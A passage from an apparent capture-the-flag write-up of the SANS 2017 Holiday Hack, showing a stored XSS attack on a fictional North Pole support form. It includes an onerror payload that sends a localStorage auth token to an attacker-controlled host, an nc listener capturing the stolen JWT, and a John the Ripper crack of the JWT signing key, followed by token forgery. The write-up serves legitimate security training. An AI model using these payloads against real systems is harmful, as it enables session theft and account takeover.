&lt;/span&gt;                    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                        &lt;span class="nb"&gt;window&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;location&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;href&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;link&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                    &lt;span class="p"&gt;}&lt;/span&gt;
                &lt;span class="p"&gt;})&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;html&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, a token stored in the local storage, under the key &lt;code&gt;np-auth&lt;/code&gt; seems
to be used for the application session management. Let's keep digging.&lt;/p&gt;
&lt;p&gt;Under the login form, there's a support link, where you can send a password
reset request to an administrator. Since we have access to Alabaster's email
account, let's try and reset his password:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/service&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;edb.northpolechristmastown.com&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;http://edb.northpolechristmastown.com&lt;/span&gt;
&lt;span class="na"&gt;X-Requested-With&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;XMLHttpRequest&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;SESSION=6S6Nd58Sy85OK09ui063&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;

uid=alabaster.snowball&amp;amp;email=alabaster.snowball%40northpolechristmastown.com&amp;amp;message=I+forgot+my+password!
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.3&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Sun, 07 Jan 2018 23:20:45 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;115&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;bool&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;link&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;/reset_request?ticket=OYHAT-T8XZR-EC2YB-U0173&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;message&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Request Submitted. Redirecting...&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now that our password reset request was sent, let's check Alabaster's email!
Hmm, nothing. Let's see what happened after our request was sent. We get
redirected to a support ticket page:&lt;/p&gt;
&lt;img alt="edb_request_normal.png" class="align-center" src="/images/sans-christmas-challenge-2017/edb_request_normal.png" /&gt;
&lt;p&gt;And our message is embedded in the page. Is it possible that they forgot to
sanitize our user input? Let's try to inject some special characters:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/service&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;edb.northpolechristmastown.com&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;http://edb.northpolechristmastown.com&lt;/span&gt;
&lt;span class="na"&gt;X-Requested-With&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;XMLHttpRequest&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;http://edb.northpolechristmastown.com/index.html&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;SESSION=53LByIBB8Ct5Z79RdsTC&lt;/span&gt;

uid=alabaster.snowball&amp;amp;email=alabaster.snowball%40northpolechristmastown.com&amp;amp;message=&amp;lt;u&amp;gt;Pretty+underlined+message&amp;lt;/u&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, if we take a look at our ticket page, we can see that the &lt;code&gt;&amp;lt;u&amp;gt;&lt;/code&gt; tag
was rendered, and my message appears underlined:&lt;/p&gt;
&lt;img alt="edb_request_underlined.png" class="align-center" src="/images/sans-christmas-challenge-2017/edb_request_underlined.png" /&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;tr&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;td&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Alabaster&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;td&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;td&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Snowball&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;td&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;td&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;alabaster.snowball@northpolechristmastown.com&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;td&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;td&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;123-456-7890&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;td&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;td&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;u&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Pretty underlined message&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;u&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;td&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;tr&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;tbody&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This means that we can try to perform an XSS attack against the administrator
that will visualize our request! I usually use tags like &lt;code&gt;&amp;lt;u&amp;gt;&lt;/code&gt; or
&lt;code&gt;&amp;lt;b&amp;gt;&lt;/code&gt; when testing for XSS, because they're usually not picked up by
WAFs or by custom implemented filters. And indeed, if we take a look at the
&lt;code&gt;custom.js&lt;/code&gt; file, we can see that there's some filtering done on the
client side to trigger on text like &lt;code&gt;script&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;// --------------------------Customer Service Request -----------------------------/&lt;/span&gt;
&lt;span class="nx"&gt;$&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;#help_button&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;click&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
    &lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;preventDefault&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;help_uid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;$&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;#help_uid&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;val&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;help_email&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;$&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;#help_email&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;val&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;help_message&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;$&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;#help_message&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;val&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;help_uid&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;match&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sr"&gt;/^\w+\.\w+$/g&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="kc"&gt;null&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;help_email&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;match&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sr"&gt;/^[\w\_\-\.]+\@[\w\_\-\.]+\.\w\w\w?\w?$/g&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!==&lt;/span&gt; &lt;span class="kc"&gt;null&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;help_message&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;match&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sr"&gt;/^.+$/g&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="kc"&gt;null&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;                &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;help_message&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;match&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sr"&gt;/[sS][cC][rR][iI][pP][tT]/g&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="kc"&gt;null&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, client-side verifications can be bypassed easily by performing the HTTP
request directly. But in that case, the check (among others) was also performed
on the server-side.&lt;/p&gt;
&lt;p&gt;So, let's use another type of XSS payload, that does not involve the word
&lt;code&gt;script&lt;/code&gt;. One of the most common is to use the &lt;code&gt;onerror&lt;/code&gt; attribute.
Let's try and see:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/service&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;edb.northpolechristmastown.com&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;http://edb.northpolechristmastown.com&lt;/span&gt;
&lt;span class="na"&gt;X-Requested-With&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;XMLHttpRequest&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;http://edb.northpolechristmastown.com/index.html&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;SESSION=53LByIBB8Ct5Z79RdsTC&lt;/span&gt;

uid=alabaster.snowball&amp;amp;email=alabaster.snowball%40northpolechristmastown.com&amp;amp;message=&amp;lt;img src=x onerror=&amp;quot;alert(&amp;#39;Huh oh, Spaghettios&amp;#39;)&amp;quot; /&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="edb_request_xss.png" class="align-center" src="/images/sans-christmas-challenge-2017/edb_request_xss.png" /&gt;
&lt;p&gt;Bingo, it works! Now, let's create a payload that will capture the
&lt;code&gt;np-auth&lt;/code&gt; entry from the local storage. The application uses jQuery,
which means that we can use &lt;code&gt;$.get&lt;/code&gt; to easily exfiltrate our token to our
public-facing website:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/service&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;edb.northpolechristmastown.com&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;http://edb.northpolechristmastown.com&lt;/span&gt;
&lt;span class="na"&gt;X-Requested-With&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;XMLHttpRequest&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;http://edb.northpolechristmastown.com/index.html&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;SESSION=53LByIBB8Ct5Z79RdsTC&lt;/span&gt;

uid=alabaster.snowball&amp;amp;email=alabaster.snowball%40northpolechristmastown.com&amp;amp;message=&amp;lt;img src=x onerror=&amp;quot;$.get(%26quot;http://X.X.X.X/?%26quot;%2blocalStorage.getItem(%26quot;np-auth%26quot;),function(a,b){})&amp;quot; /&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;And in a &lt;code&gt;nc&lt;/code&gt; on our server, we wait for our payload to get triggered:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt; nc -nvk -l -p &lt;span class="m"&gt;80&lt;/span&gt;
&lt;span class="go"&gt;listening on [any] 80 ...&lt;/span&gt;
&lt;span class="go"&gt;connect to [X.X.X.X] from (UNKNOWN) [Y.Y.Y.Y] 50132&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;GET /?eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I HTTP/1.0&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;Host: X.X.X.X&lt;/span&gt;
&lt;span class="go"&gt;Connection: close&lt;/span&gt;
&lt;span class="go"&gt;Accept: */*&lt;/span&gt;
&lt;span class="go"&gt;Referer: http://127.0.0.1/reset_request?ticket=DFYCN-8UI5I-AD87J-BRR9P&lt;/span&gt;
&lt;span class="go"&gt;Origin: http://127.0.0.1&lt;/span&gt;
&lt;span class="go"&gt;User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1&lt;/span&gt;
&lt;span class="go"&gt;Accept-Encoding: gzip, deflate&lt;/span&gt;
&lt;span class="go"&gt;Accept-Language: en-US,*&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hurray, we got our token! Let's put it in our local storage, then head to the
&lt;code&gt;index.html&lt;/code&gt; page, and... nothing. Well that's disappointing. Let's take
a look at our token. It seems to be three base64-encoded pieces of data,
separated by full stops. This seems to indicate that this is a &lt;a class="reference external" href="https://auth0.com/learn/json-web-tokens/"&gt;JSON Web Token
(JWT)&lt;/a&gt;. The first part is the
header, &lt;code&gt;{&amp;quot;alg&amp;quot;:&amp;quot;HS256&amp;quot;,&amp;quot;typ&amp;quot;:&amp;quot;JWT&amp;quot;}&lt;/code&gt;, the second part is the payload,
&lt;code&gt;{&amp;quot;dept&amp;quot;:&amp;quot;Engineering&amp;quot;,&amp;quot;ou&amp;quot;:&amp;quot;elf&amp;quot;,&amp;quot;expires&amp;quot;:&amp;quot;2017-08-16 12:00:47.248093+00:00&amp;quot;,&amp;quot;uid&amp;quot;:&amp;quot;alabaster.snowball&amp;quot;}&lt;/code&gt;,
and the third part is the signature.&lt;/p&gt;
&lt;p&gt;Our newfound token didn't work because it seems that it expired in August 2017.
We could modify the expiry date to put it in the future, but we can't compute
a new signature for our modified payload, because we don't know what secret
key is used. I tried using the trick of the &lt;code&gt;none&lt;/code&gt; algorithm (&lt;a class="reference external" href="https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/"&gt;described
here&lt;/a&gt;),
which has worked for coworkers of mine in the past. But it didn't work in that
case.&lt;/p&gt;
&lt;p&gt;What's left to us is to try and bruteforce the secret key, so that we can
create our own JWT. &lt;code&gt;JohnTheRipper&lt;/code&gt; can actually bruteforce it for us,
since it can bruteforce HMAC-256 secret keys. We just have to &lt;a class="reference external" href="https://security.stackexchange.com/a/134829"&gt;make some
changes to our token&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; cat alabaster_jwt.txt
&lt;span class="go"&gt;eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9#33b6782370adad6b78486c1f83b9a2e95f7fe2b6991397a156423d874e24afa2&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; john ./alabaster_jwt.txt
&lt;span class="go"&gt;Using default input encoding: UTF-8&lt;/span&gt;
&lt;span class="go"&gt;Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])&lt;/span&gt;
&lt;span class="go"&gt;Will run 4 OpenMP threads&lt;/span&gt;
&lt;span class="go"&gt;Press &amp;#39;q&amp;#39; or Ctrl-C to abort, almost any other key for status&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;3lv3s            (?)&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;1g 0:00:02:28 DONE 3/3 (2018-01-08 00:59) 0.006742g/s 2154Kp/s 2154Kc/s 2154KC/s 3k3ys..au10.&lt;/span&gt;
&lt;span class="go"&gt;Use the &amp;quot;--show&amp;quot; option to display all of the cracked passwords reliably&lt;/span&gt;
&lt;span class="go"&gt;Session completed&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Wow, it worked. I must confess that it was kind of my last hope, and I wasn't
sure it was going to work. But hey, we now have our secret key, &lt;code&gt;3lv3s&lt;/code&gt;,
and we can now generate valid JWT for Alabaster. I used &lt;a class="reference external" href="https://jwt.io/"&gt;https://jwt.io/&lt;/a&gt; to do
so, and obtain the following token:&lt;/p&gt;
&lt;blockquote&gt;
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE4LTAxLTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.OsSuRkYF-13eNfXyuCDYmb9XUjBhnbmQ9Oe1yRWDrH0&lt;/blockquote&gt;
&lt;p&gt;We can now log into the application:&lt;/p&gt;
&lt;img alt="edb_santa_panel.png" class="align-center" src="/images/sans-christmas-challenge-2017/edb_santa_panel.png" /&gt;
&lt;p&gt;There's a Santa panel, but we're not identified as Santa, so we can't access
it. We could try to forge a JWT for Santa, but we can see in the source code
of the application, that we actually need his password:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nx"&gt;$&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;#santa_panel&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;click&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
    &lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;preventDefault&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;user_json&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;dept&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;administrators&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;        &lt;span class="nx"&gt;pass&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;prompt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Confirm you are a Claus by confirming your password: &amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;trim&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;pass&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nx"&gt;poster&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;/html&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;santa_access&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;pass&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt; &lt;span class="nx"&gt;token&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;result&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
